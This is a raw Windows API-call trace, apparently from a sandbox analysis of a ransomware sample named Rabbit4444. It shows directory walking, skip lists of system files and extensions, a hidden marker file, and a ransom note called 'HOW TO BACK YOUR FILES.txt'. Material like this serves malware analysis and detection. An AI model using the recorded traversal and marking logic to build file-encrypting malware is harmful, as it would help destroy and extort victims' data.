0x122288 [0070.708] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x464fb0dc, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xaa1a6676, ftLastAccessTime.dwHighDateTime=0x1d336c5, ftLastWriteTime.dwLowDateTime=0xaa1a6676, ftLastWriteTime.dwHighDateTime=0x1d336c5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="280819", cAlternateFileName="")) returned 1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="Rabbit4444.exe") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2=".") returned 1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="..") returned 1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="windows") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="bootmgr") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="pagefile.sys") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="boot") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="ids.txt") returned -1 [0070.708] lstrcmpiW (lpString1="280819", lpString2="NTUSER.DAT") returned -1 [0070.709] lstrcpyW (in: lpString1=0x130ec48, lpString2="280819" | out: lpString1="280819") returned="280819" [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104e60 [0070.709] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122368 [0070.709] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4605c7d4, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4605c7d4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x4605c7d4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="296333", cAlternateFileName="")) returned 1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="Rabbit4444.exe") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2=".") returned 1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="..") returned 1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="windows") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="bootmgr") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="pagefile.sys") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="boot") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="ids.txt") returned -1 [0070.709] lstrcmpiW (lpString1="296333", lpString2="NTUSER.DAT") returned -1 [0070.709] lstrcpyW (in: lpString1=0x130ec48, lpString2="296333" | out: lpString1="296333") returned="296333" [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122220 [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x104f88 [0070.709] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122228 | out: ListHead=0xf68b0, ListEntry=0x122228) returned 0x1222c8 [0070.709] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x48361179, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x49247e6e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x49247e6e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="310091", cAlternateFileName="")) returned 1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="Rabbit4444.exe") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2=".") returned 1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="..") returned 1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="windows") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="bootmgr") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="pagefile.sys") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="boot") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="ids.txt") returned -1 [0070.709] lstrcmpiW (lpString1="310091", lpString2="NTUSER.DAT") returned -1 [0070.709] lstrcpyW (in: lpString1=0x130ec48, lpString2="310091" | out: lpString1="310091") returned="310091" [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122240 [0070.709] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x1050b0 [0070.710] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122248 | out: ListHead=0xf68b0, ListEntry=0x122248) returned 0x122228 [0070.710] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2fdaae, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x19944238, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x19944238, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="310093", cAlternateFileName="")) returned 1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="Rabbit4444.exe") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2=".") returned 1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="..") returned 1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="windows") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="bootmgr") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="pagefile.sys") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="boot") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="ids.txt") returned -1 [0070.710] lstrcmpiW (lpString1="310093", lpString2="NTUSER.DAT") returned -1 [0070.710] lstrcpyW (in: lpString1=0x130ec48, lpString2="310093" | out: lpString1="310093") returned="310093" [0070.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122120 [0070.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x11e) returned 0x10fad0 [0070.710] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122128 | out: ListHead=0xf68b0, ListEntry=0x122128) returned 0x122248 [0070.710] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4563a7b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x45ab2e45, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x45ab2e45, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="onesettings_waas_featuremanagement", cAlternateFileName="ONESET~1")) returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="Rabbit4444.exe") returned -1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2=".") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="..") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="windows") returned -1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="bootmgr") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="pagefile.sys") returned -1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="boot") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="ids.txt") returned 1 [0070.710] lstrcmpiW (lpString1="onesettings_waas_featuremanagement", lpString2="NTUSER.DAT") returned 1 [0070.710] lstrcpyW (in: lpString1=0x130ec48, lpString2="onesettings_waas_featuremanagement" | out: lpString1="onesettings_waas_featuremanagement") returned="onesettings_waas_featuremanagement" [0070.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fa0 [0070.710] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x156) returned 0x128478 [0070.710] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x121fa8 | out: ListHead=0xf68b0, ListEntry=0x121fa8) returned 0x122128 [0070.710] FindNextFileW (in: hFindFile=0x102890, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4563a7b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x45ab2e45, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x45ab2e45, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="onesettings_waas_featuremanagement", cAlternateFileName="ONESET~1")) returned 0 [0070.711] FindClose (in: hFindFile=0x102890 | out: hFindFile=0x102890) returned 1 [0070.711] lstrcpyW (in: lpString1=0x130ec48, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.711] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.711] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.711] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.712] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.712] CloseHandle (hObject=0x29c) returned 1 [0070.712] CloseHandle (hObject=0x27c) returned 1 [0070.712] GetCurrentThreadId () returned 0xd98 [0070.712] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x121fa8 [0070.712] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement" [0070.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x128478 | out: hHeap=0xe0000) returned 1 [0070.712] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x121fa0 | out: hHeap=0xe0000) returned 1 [0070.712] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement" [0070.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\" [0070.712] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\.BFC0E91B00AE8A0620D3" [0070.712] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\onesettings_waas_featuremanagement\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0070.717] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0070.719] FlushFileBuffers (hFile=0x27c) returned 1 [0070.720] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.720] CloseHandle (hObject=0x27c) returned 1 [0070.721] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement") returned 170 [0070.721] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.721] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4563a7b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x45ab2e45, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf379debf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1025d0 [0070.721] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.721] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.721] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.721] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.721] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4563a7b6, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x45ab2e45, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xf379debf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.721] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.721] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.721] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.721] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.721] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.721] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf3777cfd, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf3777cfd, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf379debf, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.721] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.721] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.721] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x45ab2e45, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x45ab2e45, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9c3165d0, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eventbeacons.dat", cAlternateFileName="EVENTB~1.DAT")) returned 1 [0070.721] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.721] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2=".") returned 1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="..") returned 1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="windows") returned -1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="bootmgr") returned 1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="boot") returned 1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="ids.txt") returned -1 [0070.722] lstrcmpiW (lpString1="eventbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.722] lstrcpyW (in: lpString1=0x130ec8e, lpString2="eventbeacons.dat" | out: lpString1="eventbeacons.dat") returned="eventbeacons.dat" [0070.722] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\eventbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.723] lstrlenW (lpString="eventbeacons.dat") returned 16 [0070.723] lstrlenW (lpString="Rabbit4444") returned 10 [0070.723] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.723] lstrlenW (lpString=".dll") returned 4 [0070.723] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.723] lstrlenW (lpString=".lnk") returned 4 [0070.723] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.723] lstrlenW (lpString=".ini") returned 4 [0070.723] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.723] lstrlenW (lpString=".sys") returned 4 [0070.723] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.723] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4589cd4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4589cd4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9c3165d0, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="Rabbit4444.exe") returned -1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2=".") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="..") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="windows") returned -1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="bootmgr") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="pagefile.sys") returned -1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="boot") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="ids.txt") returned 1 [0070.723] lstrcmpiW (lpString1="imprbeacons.dat", lpString2="NTUSER.DAT") returned -1 [0070.723] lstrcpyW (in: lpString1=0x130ec8e, lpString2="imprbeacons.dat" | out: lpString1="imprbeacons.dat") returned="imprbeacons.dat" [0070.723] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\imprbeacons.dat", dwFileAttributes=0x0) returned 1 [0070.724] lstrlenW (lpString="imprbeacons.dat") returned 15 [0070.724] lstrlenW (lpString="Rabbit4444") returned 10 [0070.724] lstrcmpiW (lpString1="eacons.dat", lpString2="Rabbit4444") returned -1 [0070.724] lstrlenW (lpString=".dll") returned 4 [0070.724] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.724] lstrlenW (lpString=".lnk") returned 4 [0070.724] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.724] lstrlenW (lpString=".ini") returned 4 [0070.724] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.724] lstrlenW (lpString=".sys") returned 4 [0070.724] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.724] FindNextFileW (in: hFindFile=0x1025d0, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4589cd4a, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4589cd4a, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9c3165d0, ftLastWriteTime.dwHighDateTime=0x1d336d8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="imprbeacons.dat", cAlternateFileName="IMPRBE~1.DAT")) returned 0 [0070.724] FindClose (in: hFindFile=0x1025d0 | out: hFindFile=0x1025d0) returned 1 [0070.724] lstrcpyW (in: lpString1=0x130ec8e, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0070.724] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\onesettings_waas_featuremanagement\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\contentmanagementsdk\\creatives\\onesettings_waas_featuremanagement\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0070.725] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0070.725] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0070.725] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.725] CloseHandle (hObject=0x29c) returned 1 [0070.725] CloseHandle (hObject=0x27c) returned 1 [0070.725] GetCurrentThreadId () returned 0xd98 [0070.725] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122128 [0070.725] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\310093" [0070.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10fad0 | out: hHeap=0xe0000) returned 1 [0070.725] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122120 | out: hHeap=0xe0000) returned 1 